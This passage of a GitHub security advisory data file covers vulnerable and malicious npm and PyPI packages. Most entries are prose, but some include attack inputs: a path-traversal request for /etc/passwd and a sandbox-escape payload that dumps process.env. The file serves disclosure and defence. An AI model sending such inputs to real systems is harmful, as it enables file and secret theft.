+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'eco'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sstephenson/eco/pull/67'}, {'type': 'PACKAGE', 'url': 'https://github.com/sstephenson/eco'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1024'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q4qf-3fc6-8x34,2021-08-26T15:14:33Z,2020-09-25T18:28:43Z,,['CVE-2020-15207'],Segfault and data corruption in tensorflow-lite,"### Impact
+To mimic Python's indexing with negative values, TFLite uses `ResolveAxis` to convert negative values to positive indices. However, the only check that the converted index is now valid is only present in debug builds:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reduce.h#L68-L72
+
+If the `DCHECK` does not trigger, then code execution moves ahead with a negative index. This, in turn, results in accessing data out of bounds which results in segfaults and/or data corruption.
+### Patches
+We have patched the issue in 2d88f470dea2671b430884260f3626b1fe99830a and will release patch releases for all versions between 1.15 and 2.3.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-q4qf-3fc6-8x34'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15207'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/2d88f470dea2671b430884260f3626b1fe99830a'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:55:41Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-wmcq-3wfx-qjx5,2020-08-31T18:22:02Z,2020-09-01T17:33:30Z,,[],Directory Traversal in nodeload-nmickuli,"Affected versions of `nodeload-nmickuli` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+Example request:
+```
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'nodeload-nmickuli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/nodeload-nmickuli'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/410'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qm4q-f956-fg64,2021-09-30T19:50:00Z,2020-09-03T17:39:13Z,,[],Malicious Package in luna-mock,"All versions of `luna-mock` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'luna-mock'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1055'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mmqv-m45h-q2hp,2022-03-14T23:59:01Z,2020-09-04T15:22:40Z,,[],Sandbox Breakout / Arbitrary Code Execution in localeval,"All versions of `localeval` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through `constructor.constructor`. This may allow attackers to execute arbitrary code in the system. Evaluating the payload
+```
+constructor.constructor(""return process.env"")()
+```
+
+returns the contents of `process.env`.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'localeval'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}, {'fixed': '15.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/espadrine/localeval/issues/9'}, {'type': 'WEB', 'url': 'https://github.com/espadrine/localeval/commit/823f112c793b8fae051eeddad61d4ed29804a56c'}, {'type': 'WEB', 'url': 'https://github.com/espadrine/localeval/commit/ce985eba77a5f89a7f718727cbaa7fb14da40335'}, {'type': 'PACKAGE', 'url': 'https://github.com/espadrine/localeval'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3cjv-4phw-gvvv,2021-10-01T13:25:15Z,2020-09-01T20:39:33Z,,[],Malicious Package in getcookies,"The `getcookies` module contained a backdoor that would allow for a remote attacker to execute arbitrary commands on the system running the malicious module.
+
+
+## Recommendation
+
+This module should be uninstalled if found used within an application. In addition to removing the installed module, you will also want to evaluate your application to determine whether or not user data or systems were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'getcookies'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/649'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:31:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-88xx-23mf-rcj2,2021-09-30T16:18:52Z,2020-09-03T22:51:52Z,,[],Malicious Package in bs-sha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bs-sha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1274'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7xf6-cpxm-5mx9,2021-09-29T21:35:53Z,2020-09-03T22:27:18Z,,[],Malicious Package in bufner-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bufner-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1264'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m7qm-r2r5-f77q,2021-09-24T20:35:29Z,2020-09-01T20:43:48Z,,[],Cross-Site Scripting in react-marked-markdown,"All versions of `react-marked-markdown` are vulnerable to cross-site scripting (XSS) via `href` attributes. This is exploitable if user is provided to `react-marked-markdown`
+
+Proof of concept:
+
+```
+import React from 'react'
+import ReactDOM from 'react-dom'
+import { MarkdownPreview } from 'react-marked-markdown'
+
+ReactDOM.render(
+ ,
+document.getElementById('root')
+)
+```
+
+
+## Recommendation
+
+No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time if you allow user input into href values.
+",[],"[{'package': {'ecosystem': 'npm', 'name': 'react-marked-markdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Vincent-P/react-marked-markdown/issues/61'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/344069'}, {'type': 'PACKAGE', 'url': 'https://github.com/Vincent-P/react-marked-markdown'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/668'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5ggx-g294-qj3q,2021-09-29T20:57:42Z,2020-09-03T21:47:29Z,,[],Malicious Package in buffeb-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffeb-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1239'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q42c-rrp3-r3xm,2021-09-30T22:02:15Z,2020-09-11T21:13:44Z,,[],Malicious Package in commmander,"All versions of `commmander` contain malicious code . The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. Upon require the package attempts to start a cryptocurrency miner using coin-hive.
+
+
+## Recommendation
+
+Remove the package from your environment and verify whether your system is running the cryptocurrency miner.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'commmander'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/923'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v86x-f47q-f7f4,2020-08-31T18:42:01Z,2020-09-11T21:09:24Z,,[],Unauthorized File Access in atompm,"Versions of `atompm` prior to 0.8.2 are vulnerable to Unauthorized File Access. The package fails to sanitize relative paths in the URL for file downloads, allowing attackers to download arbitrary files from the system.
+
+
+## Recommendation
+
+Upgrade to version 0.8.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'atompm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/959'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-73wv-v82c-xmqv,2021-09-29T20:58:02Z,2020-09-03T21:50:51Z,,[],Malicious Package in buffep-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffep-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1240'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g8vp-6hv4-m67c,2020-08-31T18:43:32Z,2020-09-11T21:23:29Z,,[],Command Injection in entitlements,"Versions of `entitlements` prior to 1.3.0 are vulnerable to Command Injection. The package does not validate input on the `entitlements` function and concatenates it to an exec call, allowing attackers to run arbitrary commands in the system.
+
+
+## Recommendation
+
+Upgrade to version 1.3.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'entitlements'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/341869'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/998'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-435c-qcpm-wjw5,2021-10-01T21:02:01Z,2020-09-03T17:05:43Z,,[],Malicious Package in fs-extar,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'fs-extar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1397'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2m96-9w4j-wgv7,2020-08-31T18:46:06Z,2020-09-03T18:06:00Z,,[],Prototype Pollution in lodash.merge,"Versions of `lodash.merge` before 4.6.1 are vulnerable to Prototype Pollution. The function 'merge' may allow a malicious user to modify the prototype of `Object` via `__proto__` causing the addition or modification of an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+Update to version 4.6.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'lodash.merge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1067'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mm7r-265w-jv6f,2020-08-31T19:01:35Z,2020-09-03T15:51:19Z,,['CVE-2020-8135'],Server-Side Request Forgery in @uppy/companion,"Versions of `@uppy/companion` prior to 1.9.3 are vulnerable to Server-Side Request Forgery (SSRF). The `get` route passes the user-controlled variable `req.body.url` to a GET request without sanitizing the value. This allows attackers to inject arbitrary URLs and make GET requests on behalf of the server.
+
+
+## Recommendation
+
+Upgrade to version 1.9.3 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@uppy/companion'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8135'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/786956'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1501'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gqfv-g9f6-3v3m,2023-09-13T23:05:29Z,2020-09-01T16:50:23Z,,['CVE-2017-16096'],Directory Traversal in serveryaozeyan,"Affected versions of `serveryaozeyan` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'serveryaozeyan'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16096'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/serveryaozeyan'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/355'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:20:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q2c6-c6pm-g3gh,2020-08-31T18:55:11Z,2020-09-04T15:07:38Z,,[],Arbitrary Code Execution in handlebars,"Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting).
+
+
+## Recommendation
+
+Upgrade to version 3.0.8, 4.5.3 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.3'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1324'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wx77-rp39-c6vg,2022-03-24T22:10:13Z,2020-09-04T15:11:03Z,,[],Regular Expression Denial of Service in markdown,"All versions of `markdown` are vulnerable to Regular Expression Denial of Service (ReDoS). The `markdown.toHTML()` function has significantly degraded performance when parsing long strings containing underscores. This may lead to Denial of Service if the parser accepts user input.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'markdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/evilstreak/markdown-js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1330'}]","{'cwe_ids': ['CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qvjc-g5vr-mfgr,2021-10-04T21:11:37Z,2020-09-04T18:03:04Z,,[],Regular Expression Denial of Service in papaparse,"Versions of `papaparse` prior to 5.2.0 are vulnerable to Regular Expression Denial of Service (ReDos). The `parse` function contains a malformed regular expression that takes exponentially longer to process non-numerical inputs. This allows attackers to stall systems and lead to Denial of Service.
+
+
+## Recommendation
+
+Upgrade to version 5.2.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'papaparse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mholt/PapaParse/issues/777'}, {'type': 'PACKAGE', 'url': 'https://github.com/mholt/PapaParse'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PAPAPARSE-564258'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1515'}]","{'cwe_ids': ['CWE-185'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:02:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f3pc-c2gf-hvgw,2021-10-01T14:10:10Z,2020-09-02T21:13:14Z,,[],Malicious Package in requets,"All versions of `requets` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'requets'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/868'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h6mq-3cj6-h738,2021-10-01T16:12:36Z,2020-09-03T23:21:16Z,,[],Reverse Tabnabbing in showdown,"Versions of `showdown` prior to 1.9.1 are vulnerable to [Reverse Tabnabbing](https://www.owasp.org/index.php/Reverse_Tabnabbing). The package uses `target='_blank'` in anchor tags, allowing attackers to access `window.opener` for the original page when opening links. This is commonly used for phishing attacks.
+
+
+## Recommendation
+
+Upgrade to version 1.9.1 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'showdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/showdownjs/showdown/pull/670'}, {'type': 'WEB', 'url': 'https://github.com/showdownjs/showdown/commit/1cd281f0643ef613dc1d36847d4c6cbb22501d91'}, {'type': 'PACKAGE', 'url': 'https://github.com/showdownjs/showdown'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SHOWDOWN-469487'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1302'}]","{'cwe_ids': ['CWE-1022'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w32g-5hqp-gg6q,2021-09-27T13:34:07Z,2020-09-02T15:41:41Z,,[],Cross-Site Scripting in mermaid,"Versions of `mermaid` prior to 8.2.3 are vulnerable to Cross-Site Scripting. If malicious input such as `A["" ""] ` is provided to the application, it will execute the code instead of rendering it as text due to improper output encoding.
+
+
+## Recommendation
+
+Upgrade to version 8.2.3 or later",[],"[{'package': {'ecosystem': 'npm', 'name': 'mermaid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.2.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/knsv/mermaid/issues/847'}, {'type': 'PACKAGE', 'url': 'https://github.com/knsv/mermaid'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/751'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qcff-ffx3-m25c,2020-08-31T18:59:58Z,2020-09-04T17:31:44Z,,[],Command Injection in meta-git,"All versions of `meta-git` are vulnerable to Command Injection. The package fails to sanitize input and passes it directly to an `exec` call, which may allow attackers to execute arbitrary code in the system. The `clone` command is vulnerable through the branch name.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'meta-git'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/728040'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1457'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9cph-cqqh-36pw,2021-10-01T20:17:59Z,2020-09-04T15:29:25Z,,[],Malicious Package in babel-loqder,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
